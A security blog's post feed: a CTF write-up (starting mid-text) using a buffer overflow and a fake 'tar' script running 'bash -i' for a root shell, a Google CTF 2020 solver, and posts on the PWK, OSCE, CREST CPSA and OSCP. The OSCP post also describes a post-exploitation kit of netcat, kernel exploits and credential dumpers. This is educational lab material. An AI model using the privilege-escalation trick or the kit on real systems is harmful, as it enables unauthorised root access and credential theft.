3) Delete an user
4) Write a note
5) Show a note
6) Save a note (not yet implemented)
7) Delete a note
8) Backup notes
9) Quit
========================================


Your choice: 

We can observe the following:

Creating a user will create two buffers, user and role
Deleting the user will release the user buffer but not the role buffer
Writing a note that exceeds the buffer length will affect the role buffer.

Given these observations, we can try to overwrite the role buffer with the value admin after the user buffer is released by writing a a large enough note:

Looks like that worked. Having overwritten the buffer, we have essentially escalated our privileges and gained the ability to backup notes. But we don’t really want to backup silly notes. We want the root flag. Let’s create a tar file and have it execute instead of the actual tar file:

//tar file contents

#!/bin/bash
bash -i

After that, all that’s left is to get the flag:

Google CTF 2020 beginner

Mon, 24 Aug 2020 00:00:00 +0000

A short writeup for one of the first challenges for Google CTF 2020

The Challenge

The binary is essentially a “flag checker:” it checks if the input is the value of the flag.

How does it do that?

First Check

It accepts input via scanf, the size being 15 characters. It then uses SIMD instructions to check if the flag is valid.

The what?

Same here. Have a wiki. All of that isn’t really important, save for the instructions used:

pshufb
paddd
pxor

Second Check

There are two checks:

If the input is the same after it has been processed with the SIMD instructions, and
If the input starts with the CTF{

The input is shuffled in place, combined with a certain value, xored with a key and finally compared to the original input. The shuffle order, the added and the key values are stored as objects:

obj.XOR = 0xaaf986eb34f823d4385f1a8d49b45876
obj.ADD32 = 0x6763746613371337fee1deaddeadbeef
obj.SHUFFLE = 0x000d0c0a08040f030e090b0501070602 or [0,13,12,10,8,4,15,3,14,9,11,5,1,7,6,2]

The shuffle order is determined by obj.SHUFFLE (e.g. 1234567890abcde -> 1dca954e0b62873), followed by adding obj.ADD32 and xoring with obj.XOR. However, SIMD instructions are not the usual x86 instructions. They work differently, particularly paddd. An add instruction operates like this:

DEST ← DEST + SRC;

But paddd operates like this:

DEST[31:0] ← DEST[31:0] + SRC[31:0]; DEST[63:32] ← DEST[63:32] + SRC[63:32];

The former combines two values and stores them in the destination register. The latter breaks up the values into “double words” (32-bits) and performs addition on each double word. If the resulting sum is larger than 32-bits, it is wrapped around dropping the carry-over bits. In other words, if it’s too big, the excess is removed and the remainder is kept. The result is less accurate than the actual sum but this is crucial in finding the value of the flag.

But wait

How is the flag found? How to get what is supposed to be looked for? Fortunately, there are two pieces of information to find the flag:

It starts with CTF{ and,
It is 15 characters long.

Surprisingly, these are enough to find the flag with a potential third piece of information (i.e. It must be composed of printable characters). The flag’s value is bruteforced for all values that pass the checks. The checks are very stringent, decreasing the possible values to find. The complex part of finding the flag is in the implementation of paddd:

The function breaks up (shuffled) input and obj.ADD32 each into 4 segments:

Each segment is matched and added to the corresponding segment and xored with 0xffffffff removing the carry-bits/excess value. Finally, the resulting segments are combined back into one.

To bruteforce the flag, the result of the first check is checked for printable characters. If any are found, they replace the placeholders in the flag:

Code

#!/usr/bin/env python3

import string, binascii

def main():
	prefix = "CTF{"
	
	flag = ["x" for x in range(15)]
	for i in range(4):
		flag[i] = prefix[i]
	flag += '\x00'
	
	while(1):
		print("Array: ",flag)
		shuffled = shuffle(flag)	
		print("Shuffled: ",shuffled)
		sum32 = add32(shuffled)
		print("Sum: ",hex(sum32))
		xorCheck = binascii.unhexlify(hex(xor(sum32))[2:])[::-1]
		print("XOR Check: ", xorCheck)
		tmp = xorCheck + b'\x00'
		if tmp == ''.join(map(str,flag)).encode():
			break
		else:
			for i in range(4, 15):
				if chr(xorCheck[i]) in string.printable:
					flag[i] = chr(xorCheck[i])
			print("New: ", flag)
		
	print("Found: ", "".join(map(str,flag)))	

def shuffle(flag):
	order = [0,13,12,10,8,4,15,3,14,9,11,5,1,7,6,2]
	shuffled = ""
	for	i in order:
		shuffled+=flag[i]
	return shuffled
	

def add32(shuffled):
	toBytes = int(binascii.hexlify(shuffled.encode('utf8')), 16)
	leet = 0x6763746613371337fee1deaddeadbeef
	multiple1 = wordify(toBytes)
	multiple2 = wordify(leet)
	
	sum32 = 0
	
	for m in range(4):
		sum32 += (multiple1[m] + multiple2[m]) << (96 - (32 * m)) & (0xffffffff << (96 - (32 * m)))	
	return sum32	
	
def xor(sum32):
	return 0xaaf986eb34f823d4385f1a8d49b45876 ^ sum32
	
# Break large int into 32-bit words
def wordify(largeInt):
	bits = 0xffffffff
	word1 = (largeInt >> 96) & bits
	word2 = (largeInt >> 64) & bits
	word3 = (largeInt >> 32) & bits
	word4 = largeInt & bits
	return [word1, word2, word3, word4]
	
if __name__ == "__main__":
	exit(main())

Note: While input is 15 characters, the operations are done using 16 characters. Adding a null-byte to the input remedies this.

PWK Update 2020

Thu, 04 Jun 2020 00:00:00 +0000

If you want to know my experience before the update, see my bloviations here.

A Look Back

If you’ve ever read reviews on Offsec’s courses, you’d probably come across several saying they’re “outdated”, “not for new people”, and they’re the “new CEH” (The last one might be confusing as CEH is usually recommended as an alternative due to PWK’s difficulty). There have also been allegations of cheating gaining traction around 2018 and culminated to the implementation of proctored exams by early 2019 due to an exam leak.

A disgruntled student

While public perception of the courses is positive, it gradually soured. OSCP holders have had a lead over other entry-level certifications. As a comparison, in the US the average salary of a pentester with CEH is $91,000 while the average salary for an OSCP holder is $97,000. Granted, CEH holders have an edge and flexibility as the overall average salary across multiple cybersecurity roles is slightly higher than those of OSCP holders, it’s clear if you want to be well-paid as a pentester, you must go for OSCP. Moreover, a new role has become more relevant: the #RedTeamer. #RedTeam roles have been on the rise and more course offerings are put out to help fill the skills gap, something PWK lacked at the time. As demand for OSCP holders grew, they also received more scrutiny. The reputation of the courses, the brand Offsec has been building up, and the credibility of cert holders were put into question. The proctored exams were a step in the right direction but there was still a long way to go.

Gruntling the Disgruntled

On February 11, 2020, Offsec announced the update ¹ ². The responses were mixed:

Joe needs to calm down.

The confusion was understandable. The change was communicated poorly; there was little to no announcement of the plans for the update in any of their channels to existing students. Their social accounts made no mention of the upgrade up until the announcement. It could have been posted in the student forums and it would be just as effective.

Oddly enough, it fits Offsec’s “style”. They’ll dump the details on you and you do the research (#TryHarder indeed, right Joe?). This is not the first time they upgraded their course. To think after several upgrades, they will fumble such important news.

The Update

If you haven’t read up on the changes yet, you can go through here and here. But if you’re a returning student, what changed?

In a nutshell:

Most of the Windows and *nix machines were upgraded.
Powershell is now viable and highly significant.
Active Directory attacks are now possible.

Also:

The machines increased from ~50 to ~70 (excluding the Sandbox/Poultry network).
The Big 4 are no more. There is now the Big 5.
Due to infrastructure upgrades, some attacks and methods on legacy technology (e.g. snmp cracking) are no longer possible.
The materials are now “new people friendly”.

Kudos to Offsec! They made the labs more engaging and more challenging than ever before. The upgrade to the latest windows version modernized the lab environment, bringing it closer to how corporate environments are designed. This also made powershell more significant and a great boon. In the past, powershell was rare and barely usable. It’s now one of my favorite tools and attack surfaces (#RedTeam). The upgrades also revived old machines. They have tauted:

… The new version of PWK contains more than double the content and 33% more lab machines.³

And they certainly delivered. They toned down the “CTF-style” boxes and revamped the old ones to require new approaches. This needed sharpening of old skills, learning new ones and adding new tools to your arsenal. Combining both revamps and new machines, I’d say there’s easily 50% new machines (practically speaking). Some of the “Big 4” got nerfed. New and more difficult machines usurped their place to form the “Big 5”. As most of the new machines were added to the Public network, there’s more than enough activities there to keep you engaged. Besides these, there are other subtle changes to the labs for students to discover.

In the past, I didn’t bother much with the web player which came with the videos. Now it’s more easy to play them anywhere, anytime (mobile friendly and supports dark mode!). The course guide is easier to follow but remains challenging: it walks you through the attacks as you perform them in the Sandbox environment (to be honest, I just skimmed through them). Customer support is quicker and better but could be improved. They junked the reservation system. No more waiting for slots to open! Upon registration, you get your labs next day and your materials only a few hours after payment. For inquiries it used to take more than a day just to get a reply, but now you can expect a quicker turnaround.

Wait!

Should you upgrade? No.

I thought there could be some wiggle room here but this quote stuck out to me:

There is no requirement from OffSec to update your certification – once an OSCP, always an OSCP. ⁴

Certainly, there is value in the course but if you’re certified, why bother? The update, while welcome, can be sought elsewhere and this rings more true as courses increase in quality and quantity. It is only important insofar as it keeps the course fresh. If you bought the course shortly before the update, there might be cause to get it. But considering the price is $200, it’s pretty steep especially considering expenses on courses and exams are planned out in advance, something students were clearly unprepared. While the labs offer some #RedTeaming exercises, you can arguably get better value from other courses for lower fees. Its tempting to think the upgraded PWK is comparable to other #RedTeaming courses but upon closer look, it’s more of an introductory course.

Wrapping up

While the PWK 2020 experience was enjoyable, I had some reservations. PWK still delivers value just as it always did but it received an upgrade a little late, with competitors already overtaking them (I am purposely leaving out these other courses as I don’t want to get into the comparison). For the student, if you have time and money, maybe this upgrade is for you. If you have both and already certified, save (unless you’re in it for nostalgia). You’re not at a loss by buying the upgrade, but you can do better elsewhere. Your job prospects remain the same regardless if you’re certified through PWB v2.0/PWB v3.0/PWK/PWK 2020. To repeat Offsec, “Once an OSCP, always an OSCP”. OSCP has already opened many doors to many professionals and carried many further into their careers. I will close with this:

In recent weeks I have been reading comments online about the Penetration Testing with Kali Linux (PWK) course and OSCP exam taking a lot of flak for being “tool old” and using “outdated exploits that don’t even work anymore.”… But that is beside the point. The PWK and OSCP exam are all about teaching you how to think, solve problems, persevere, and develop a pentesting methodology that works for you. ⁵

OSCE and Me

Sun, 02 Jun 2019 00:00:00 +0000

So it’s time for that yearly blog update. I hope to maintain this consistency throughout the lifetime of this blog.

Catching-up

The beginning of the year brought exciting changes to my career: A new role and a lot more time. This was perfect as there’s a lot of catching-up with the backlog of reading materials and planned trainings.

Last year was tough. Work kept me from immersing in my studies; the spare time between commutes and the few moments of downtime were spent reading. But no sapling ever grew to awesome heights with specks of sunlight and drops of dew. And so I resolved to change my predicament and looked for another job.

After settling-in, I attempted the CTP Registration Challenge. While not going in stark blind, I can’t say I knew what I was doing at the time. The challenge was quite interesting and can be solved by tinkering and being “curious” of what’s under the hood.

The Course

The course is quite short: A month of lab time, and dedicating maybe 30 minutes to an hour every day is enough to finish it. The syllabus can be viewed as the list of the few exercises to accomplish. There are no extra exercises to attempt (unlike OSCP but more on this later). For practice, you can follow some guides out there, look for exploits in exploit-db or find vulnerabilities on your own (the former is more practical). Building a lab environment is feasible, and the concepts from each exercise are portable so things can be done at your own pace.

The materials are easy to follow, though some topics were lacking (e.g. alphanumeric encoding). There are excellent supplementary guides from Corelan & SecuritySift that expand on the the syllabus. They’re lengthy and best studied while following along. The distro of choice is the old Backtrack but any other is fine, even for the exam (Parrot OS is a great choice). A lot of time was spent wrestling to replicate exploits locally. Sometimes it can be done with wine but it is still best to keep a Windows VM handy.

WINE Is Not an Emulator. It’s not a miracle either.

Throughout the course, I relied heavily on radare2, radare2 tools (i.e. rasm2, rax2, ragg2) and Python. Learning r2 during the course was a great boon and since then it is part of my toolset.

A word of caution: while r2 might be great, it can be pretty unreliable. Modifying files can be dodgy. For your sanity, refrain from using that feature (until they fix this). I think I grew some wrinkles, in visible and non-visible places, trying to make it work.

Assembly language is heavily used so it’s best to have references handy. The folks over at nets.ec have this great wiki to aid in writing shellcode, especially when encoding to Alphanumeric/ASCII. rasm2 is useful as well:

rasm2 "jmp 16"
eb0e
rasm2 -d eb0e
jmp 0x10
rasm2 -D eb0e
0x00000000 2 eb0e jmp 0x10

And for De Bruijn patterns, ragg2:

ragg2 -P 10
41414142414143414144
ragg2 -P 10 -r
AAABAACAAD
ragg2 -q 0x43414144
Little endian: -1
Big endian: 6

While r2 is a great tool, Ollydbg is the tried & true debugger. Hard as I tried, I couldn’t fully do without this excellent tool. It is very beneficial to learn its basic commands to fully appreciate its capabilities. It’s best to know basic step commands, breakpoint setting, memory & command searching.

The Exam Attempt

Before the week labs ended, I scheduled my exam. If I would’ve known the next available slot was a month away, I would’ve scheduled as soon as receiving the course materials! I watched the schedule page almost every day for earlier slots. In the end none opened up, and I was stuck with a crappy one which began past midnight on a work day. Having no more lab time, I resolved to practice on my own and study exploits from exploit-db.

Exam day arrived. First day: things were going great. Two items solved, two remained. Though a simple mistake crushed my chances. Basically, I was smart enough not to realize that opening an application through the debugger is not the same as opening an application and attaching the debugger to it. That proved to be a critical (and costly) mistake. The exam ended with arms raised in frustrated defeat. It didn’t really feel that bad because I can always try again. That is until the next day when the mistake was discovered with the vulnerability that was missed!

On the third day ~~(half)~~ a report was submitted to offsec. Big Oof.

The Exam Attempt (Part Deux)

The schedule was still tightly booked; the next slot was another month away. “No matter”, I thought. “I’ll make it this time.”

Realizing my errors and shortcomings, I resolved to work on them. I polished my code and ported them from my home lab to the course lab (to get a re-attempt, a lab extension must be purchased). I felt refreshed and ready to try again.

Exam day arrived again. This time I had a better schedule and a clearer path. And yeah, I made sure to start the app and attach the debugger this time (as anyone with sense has been doing all this time). I was able to finish up on the first day, wrote the report and sent it off for grading by Saturday midnight.

Try (Waiting) Harder

The next week was spent in anxious waiting. The lack of updates from offsec had me in a nervous state. “Did I miss anything? Are my solutions wrong? Were hundreds of screenshots not enough?” By the middle of the week, I broke the silence and reached out through email and live chat. They politely told me to ~~fuck off~~ wait as the report was still being graded. I didn’t want to risk waiting for a failed result and spend the rest of the year retaking the exam over and over and over and…

By Saturday night, the results came in. While it felt great to pass, it did not feel as jubilant it should have been. Offsec has excellent service, but I believe their processes can be improved, especially when their certs are gaining worth and recognition. Nevertheless, I thanked their support staff for putting up with my whining and for confering the certification.

Wrapping up

OSCE is a really great course and it deepened my knowledge and understanding of exploit development. It shows its age which, in itself, is an old criticism. But there is little to update to this course anyway, at least for exploit development. Sure the practice vulnerabilities can be updated but that is as far as it goes. The Web & Network related topics seem to be there to pad the course out. Surely, these topics are areas in need of improvement.

While short, it felt a lot shorter. In OSCP, there were three networks to break but for OSCE there isn’t even one. To practice, you must build a lab. The price bump seems hard to justify, but there aren’t many courses that can compare on top of its industry recognition among other things.

I am still grateful for taking this course, and I am excited to take on OSEE. It’s damn expensive but as they say, “See how”.

Study Materials

Note: I didn’t really have a study plan so I just followed other people’s guides, which were more than enough.

CREST CPSA Exam

Sun, 23 Sep 2018 00:00:00 +0000

This post aims to give a rough guide on how to attain CPSA status for OSCP takers.

What is CPSA?

CREST is a not-for-profit (contra non-profit) organization that provides accreditation and certification related to information security. If you’re a pentester, chances are you’ve come by a role/job that desires certifications from CREST. Most notable are CRT and CPSA.

CREST Registered Penetration Tester or CRT is basically the equivalent of OSCP as it assesses the hands-on, technical skills of an individual. CREST Practitioner Security Analyst or CPSA is the counterpart that tests for knowledgeability. Having both CRT and CPSA grants you Full CREST Equivalency. You can check out their website for more info.

Why get Full CREST Equivalency?

This is a good cert to go after as it is widely-known and it’s actually cheaper for OSCP holders: Normally it would cost around £645 (CRT is £395 and CPSA is £250, without VAT). You can also check out why to get certified from this page.

How do you get Full Equivalency?

If you took OSCP first before possessing any CREST-related certs, you have the opportunity to get CRT and CPSA certified or Full equivalency.

Process

Send an email to CREST at exambookings@crest-approved.org requesting Full CREST equivalency. Include the following:
- Updated CV
- Proof of your OSCP attainment: Include your OSID and a scan of your certificate.
- A signed copy of the CREST Code of Conduct. (You may need to get an updated copy from them first.)
Send your billing details. These will be used to send the CRT cert* and the billing for the CPSA exam. (It took about two weeks for my certificate to be delivered):
- Contact name
- Email address (kind of redundant but you know)
- Postal address
Pay the Administration fee (£350)**. After payment you will receive instructions to update your profile and submit your application in their portal.
Schedule the exam. You will receive an email containing the voucher code and instructions for setting-up an your exam schedule.

Note:

*The CRT cert you receive will only be valid for six months after which it will be revoked. By passing the CPSA exam, you will be granted with Full CREST equivalency extending the validity to 3 years after attainment of OSCP.

**If you failed your attempt, you have to pay again.

In order to minimize procrastination, I scheduled the exam as early as a month ahead. In this way, I have some time to comfortably prepare while keeping a reasonable deadline.

Preparation

The topics covered in the exam can be found in the CPSA syllabus. As of this writing there are ten knowledge groups which can be condensed roughly into:

Soft skills
Pentesting methodology
Networking Security
Web Security
OS & Database Security

The syllabus contains everything you need to pass the exam. I say “pass” as getting down the basics of all the knowledge groups will probably net you the minimum needed to pass the exam.

Some important things to note:

The exam has 120 Multiple Choice items to be answered within 2 hours. The passing mark is 60%(72 items).
It is closed book, no notes and references can be used while taking the exam.
Additionally, there’s the ~~dreaded~~ NDA to be signed before taking the exam. Breaching it will revoke your CREST certification.

Prep work can be straightforward, but the difficulty lies in investing time and effort. As the syllabus is the only yardstick you have, it’s hard to know the depth for each topic in each knowledge group. It’s easy to think that overpreparation is a good approach. But it is far better to focus on getting the gist rather than going deep, especially in areas you are lacking. Aim for a good spread: more basics nailed down, more improvement to your chances to pass. I encountered some “Gotcha!” questions in the exam, questions I thought required a certain amount of experience to answer, and some which were somewhat esoteric. But in hindsight, a good foundation was key in helping me to pass.

With regards to study materials, there’s no better way than to google for them. You should only include materials you have some “confidence” in. If a material is too difficult, it probably won’t stick. If it’s too shallow, there might be better alternatives. Keep them concise and organized to make them more digestible. If some topics are your weak areas, always remember to include only the basics. For general references, you can rely on OWASP and Wikipedia.

CREST also recommends some books and courses for prep work. If you can spare the money, go for the courses. Having options and alternative studying methods are always great. Having said that, I can’t make any personal recommendation of the courses as I am always trying to keep my expenses down. For books, I own Red Team Field Manual & Cryptography Engineering. Having ~~partially~~ read both of them, these are books I can recommend. I also read Attacking Network Protocols by James Forshaw which covers a lot of the topics related to network and web protocols, cryptography, and related vulnerabilities.

Studying for the exam took about a month, but I wasn’t studying everyday. I incorporated “Spaced Repetition” due to the amount of material to be absorbed. My approach was to intensely study as much of the reviewer as I could for the first week, and then study again a week before my exam ~~and cram on the day before~~. For those two weeks in between, I would do other stuff. I found this to be a great approach as it takes advantage of how the brain operates when it has some unfinished task, when it’s forgetting and it’s trying to remember stuff etc. It may seem stressful but overall the experience was actually pleasant.

Exam Day

The exam took an hour to finish. The remaining time was used to review and tally the items I was confident to be correct. This helped me assess the likelihood of passing. The final tally ended up being really close to the score I got in the end. After the exam, the results were given right away.

Final Thoughts

Taking CPSA was a perplexing experience. Preparing for the exam felt like guesswork even if a syllabus was provided. It feels as if I took it again, I would be facing a different beast. It didn’t really feel like it was a test of knowledge and experience. Rather, it felt like a test of how much trivia I can fit in my head. Perhaps I have some misplaced expecations from the exam. Despite these misgivings, I can still recommend this cert for any aspiring candidates. It’s a good cert that can open doors for professionals who have taken OSCP, especially for those who recently passed and looking for their next challenge and a boost to their profile. Give it a try if you’re interested.

If you have further questions feel free to contact me. Good luck!

OSCP and Me

Tue, 17 Oct 2017 00:00:00 +0000

This post took some time to write as I had my laptop’s keyboard fixed. In my eagerness to reach for water, I spilled it over my keyboard. If this happened during my exam, my bowels would have dropped with biblical magnitude.

A Bit of History

Last year, I set my goals for 2017. My top priority was to achieve OSCP. This cert was awesome because:

It was relatively cheaper than other industry-recognized certs.
It was highly regarded by most security professionals due to the difficulty of the accompanying course, among other reasons.
It greatly enhances students’ knowledge on “Offensive Security” (more of the subject and less (incidentally) about the vendor)
It had no “maintenance fees”.

At that time I knew I was far from prepared:

Neither did I know how to avail the course nor did I personally knew any OSCP holder who can guide me.
There were huge gaps between my knowledge and of the subjects included in the PWK Course Syllabus, particularly with Buffer Overflows, Client Side Attacks and Port Redirection and Tunneling.
My pentesting skills, though palpable, were not mature enough. They were mostly effective in isolated environments (e.g. vulnhubs).

A good way to know if you’re prepared is to ask “If you were in the middle of a situation X, would you overcome it?”. If someone asked me to take the course at that moment, I would have struggled twice as hard than if I had prepared appropriately.

What’s the plan?

To prepare, it was necessary to take stock of my overall capabilities and resources:

I had ample knowledge of web vulnerabilities from Vulnhub VMs and CTFs.
I knew how to read and to program in various programming languages, particularly Python.
I am experienced in using Linux, particularly, Kali.
I had a good laptop that is capable of running VMs.
I had a fundamental understanding of network protocols (e.g. TCP, UDP)

My biggest hurdle was on the subject of Buffer Overflows as my knowledge of it was mediocre. I knew nothing of Client Side attacks and I can barely simulate port forwarding. Everything else in the PWK Syllabus I have already practiced. It was only a matter of filling up these gaps in order to be competent enough for the course. But I also had practical worries:

Money - There was less than a year to save up for the budget.
Time - There was less than a year to study.
Internet - My internet plan needed to support the VPN for the labs. Internet in the Philippines can be described with various four letter words. Decide which you prefer.

If I wanted to take the course, I needed enough time and money to capture my budget and to allot time for the course and any exam attempts. For my plan to work, I needed to save enough for the 60 day labs + Exam attempt package and upgrading my internet plan.

My plan was simple but risky.

Save enough money to avail the course and any retake attempts.
Gather enough studying material based on the PWK course syllabus.
Study the materials to gain enough knowledge to accomplish the labs as soon as the course starts.
Take the exam.

Its slipshod and not recommended. Due to my financial situation, I had to adapt to a strict budget and time frame which seemed to convolute things. Indeed they did. But time and money were not on my side. I have been saving up for a long time ever since I made OSCP one of my goals for 2017. The rate at which I saved only allowed 60 days worth of labtime with a cushion fund for about two retakes. If I wanted 90 days worth of labs, my goal would have been pushed to 2018 as it meant I would need to begin my labs at a later date. That was unacceptable; I had to be practical if I were to do it.

The “Plan” in action

The budget needed to be built right away. For the following months, I set aside an additional portion of my pay, besides my savings, and any extra income for the budget. At the same time, I studied. To make the most out of lab time, I needed to be equipped with the basic skills necessary to progress as soon as it started. But my pace was leisurely. It does not take too much time to acquire the basic skills as most of the time was used in practising and honing them. I did Vulnhub VMs whenever I could and read whenever I were away from my laptop. I also begun collecting blog posts and articles of OSCP holders to get an idea of what to expect from the course. Jollyfrogs’ account of the course mentions that there were around 60 machines (in truth there were around 50) in the labs. This was both fortunate and unfortunate as though there were enough lab time, it required taking down one machine per day.

For almost a year I stuck to my plan and eventually it bore some fruit. As early as June I had enough money to avail the course. It was finally time to register. As I was not sponsored by my company, I had to do things a bit differently. For starters, when submitting your details at the Registration Sign-up Form, it requires you to submit scans of your government-issued ID. I sent over a pdf of my driver’s license scans to registrar@offensive-security.com. After acknowledging receipt, they sent an email containing confirmation of successful reservation for the course, my OSID/Student ID, and instructions for testing lab VPN connectivity and for paying the fees. I scheduled my labs to begin a full month after I registered as I figured it would not hurt to have final preparations before starting.

And so it begun. There was no going back. To quote Canto III of the Inferno, “Abandon all hope, ye who enter here.”

Descending the Rings of Hell

Labs started. I received my course materials and have downloaded the PWK VM in advance. Prior that, I joined a slack community, NetSecFocus where fellow students studied together. There was a channel where only students may join and where some Offsec student admins make appearances (all hail the great llama Abatchy!). Students and OSCP holders offered some great advice, articles and tools that helped in taking the course. If need be, I had the help of the student community at close reach as well as a wealth of knowledge from the course materials. At that moment I felt ready to take on the course.

On the same evening I took down my first machine, Alice. It was a really easy machine but a good first step. I begun to fulfill my quota of 1 machine/lab day, working 3 to 4 hours each weeknight and as much time in the weekends throughout the course. Of course there were times I was not able to stick to my quota: On some days I would be away on vacation, on some days I would be stuck on some boxes. Nevertheless I finished all the lab machines across three subnets. It was only in the labs that I was able to learn pivoting and client side attacks. As I progressed, I formed my own methodology based on what worked best. I discovered that:

Information gathering is very important. Take down as many notes as you can. Capture screenshots whenever you’ve confirmed a vulnerability, any vulnerability, especially once you’ve escalated privileges. The purpose of a good information gathering phase is twofold. First, the more time spent on this phase, the less time you need to compromise the target. If ever there’s a time a wall has been reached, it is most likely there is not enough information to go by. Second, it will prevent you from backtracking by providing you enough material to build your Lab Report. Submitting a Lab Report helps a student pass by adding 5 bonus points to your exam score.
Pay attention to details. Sometimes, the devil is in the details. Learn to put two and two together and you’ll be able to see the bigger picture.
A good Post-Exploitation phase helps in lateral movement. Once you’ve successfully taken down a machine, explore it. Because the lab machines form a corporate network, they have relationships to other lab machines that become apparent upon further inspection. This was an entirely new concept to me as I was so used to isolated Vulnhub VMs that required no prerequisites and that required only direct attacks.
Build a Kit. It’s annoying to have to go back and forth transferring multiple tools and exploits from your machine to your target. Make the process easier by building a kit. A good kit is composed of tools that will aid you in transferring other tools, creating backdoors, uncovering credentials and escalating privileges. My kit is usually composed of a privilege escalation suggester script, netcat, two well-known kernel exploits, and credential dumping tools all packed inside a Zip archive. A Python SimpleHTTPServer is running to serve the kit and any of the individual files should Zip decompressing prove to be impossible.
Don’t go after the Big Four immediately. This one is contentious, I think. Very often, students race to finish them for whatever reason. I think these machines serve a better purpose by helping students prepare for the exam. What I did with them is to simulate a “mock exam” by doing all of them simultaneously in addition to another lab box within the span of 24 hours. Though in my case, I failed by my own standards. Having stumbled on sufferance in my first 2 weeks, there were only three of the Big Four left for the mock exam. Not only that, after finishing all of these boxes I was so tired that by the end I was unable to do two more. The experience did teach me that the exam was no joke as it was both mentally and physically burdening. It also taught me that dwelling on a box before moving on severely hinders progress. It was better to switch boxes from time to time.

By the time I finished the entire lab network I had less than a week left of lab time. This time was used to rush my Lab Report ahaha. It was probably the most tedious part as I begun going through the lab materials right before the end. There were so many of these exercises to answer and to document that I had to sacrifice sleep time just to finish the report. Damn 5 bonus points.

The 9th Circle

After finishing the lab report, I had about two weeks ahead before taking the exam. This was the soonest schedule I got. Coming out of the labs, left me drained. The ordeal was toilsome though the end was also near. Or so I thought.

My activity in the weeks ahead of the exam alternated between resting and practising. I figured that it was necessary to keep my health up while retaining everything the course taught me. I reviewed my notes and wrote “Lessons Learned” sections for each as refreshers. Kits were prepared. The lab report was cleaned up and an exam report template was also prepared.

Exam day came. I was scheduled in the afternoon but only had 3 hours worth of sleep. Tossing and turning didn’t help get more. With each hour of unrest I grew more anxious that by the time I started I was wide awake with stress. It was only the beginning of worse things ahead. After 5 hours I got my first machine. 9 hours before exam ended I got my second. Five hours after, I got a low privileged shell on another. The rest of my time was consumed in desperately throwing every exploit I could find. My first exam attempt ended in miserable failure. During the exam, I could feel the stress washing over me in waves. Each frustrated attempt was punctuated by heavy exhalation. As each hour passed my head felt hotter, my heart beat faster, my hands shook more heavily and my eyes grew more bloodshot. In essence, I strayed from the methodology I’ve learned, let stress get to me and surrendered my fate to luck.

I fought the battle to the bitter end. But the war went on.

Purgatorio

I knew I didn’t have enough points to pass. Even worse, there was one screenshot missing. So, there were even less points to not pass. Great.

I contacted support to fail me so I could immediately schedule my next exam attempt. They were very obliging so after submitting my report, they sent instructions for the exam retake. The exam report was not necessary but I wanted experience on writing a proper one and I needed feedback on my performance.

The following days were spent in dejection. Fear of failure was greater than before. I was haunted. But hope was there. I reviewed my weak areas and prepared accordingly. My confidence slowly restored. Doubt still lingered but I had to forge ahead in spite of it.

Exam day came again. This time it went better. The preparations safeguarded me from previous pitfalls. On this attempt I went back to my roots, and got enough points to pass and remembered to secure screenshots! Writing the report for the second time was easier with the insights I learned from the first attempt. Three hours before the submission, the reports were finished, archived, uploaded and sent for review.

Paradiso

The following day, Offsec sent this:

It feels great to be OSCP. But honestly, I still feel like a script kiddie in the sense that I still have a lot of things to learn.

And that is what drives me, learning. You would suspect that being acknowledged for hard work would imbue a greater sense of self-worth. But it is more correct to say that having been shown the great expanse of the InfoSec field made me more aware and more excited for my education.

Achieving the highly regarded certification is no easy undertaking as it had drawn out potential I never thought I had. In the past I was satisfied with the rate at which I educated myself. My usual routine would be to gather free studying material on any topic I would fancy and go through them at a steady pace. After having grasped the material, it was tested out at my home lab. But with the PWK course, this process was exaggerated. I am tempted to say that the way I did things may have had a role to play, but the course’s difficulty, for the common security enthusiast, is the main factor in driving growth.

Lessons Learned

Offensive Security is known to urge people to “Try Harder!” But I think their other pithy, golden phrase receives less emphasis: “Stay Humble!” Abandon hope as if you’re starting humbly from scratch. Then take on the challenges. With each challenge overcome is hope regained. Failing is fine just as failure of fear is also fine. Just make sure to do better next time.

I really enjoyed the course. Through it I proved I can be better. Most importantly, I gained new friends. I’d like to thank my study buddies at slack for their company and insights, my family, friends, and my girlfriend for all the encouragement and support. This is not yet the end so I hope I can depend on you again next time!

Study Materials

For a complete beginner, I believe the materials below will help in preparing for the course. The more time invested, the closer to getting OSCP certified.

Vulnhub
Exploit Exercises - these helped me study for Buffer Overflows and SUID/SGID vulnerabilities
OSCP-like Vulnhub VMs - I finished the beginner friendly and intermediate VMs before taking the exam.
Cybrary - I did not use this resource but beginners would find this very useful.
LiveOverflow - Awesome video tutorials. Because of his videos, I grew to love GDB over any debugger.
GynvaelEN - His videos might be advanced but informative.
Xapax’s Security Notepad - An excellent compendium of notes. Useful in Windows Exploitation.
Basic Linux Privilege Escalation - a well known guide to linux privesc. It can be argued that a lot of people whether taking OSCP or not, owe something to this guide.
Windows Privilege Escalation Fundamentals - another well known guide for Windows privesc.
HighOn.Coffee - excellent resource for Web Vulnerabilities and attacks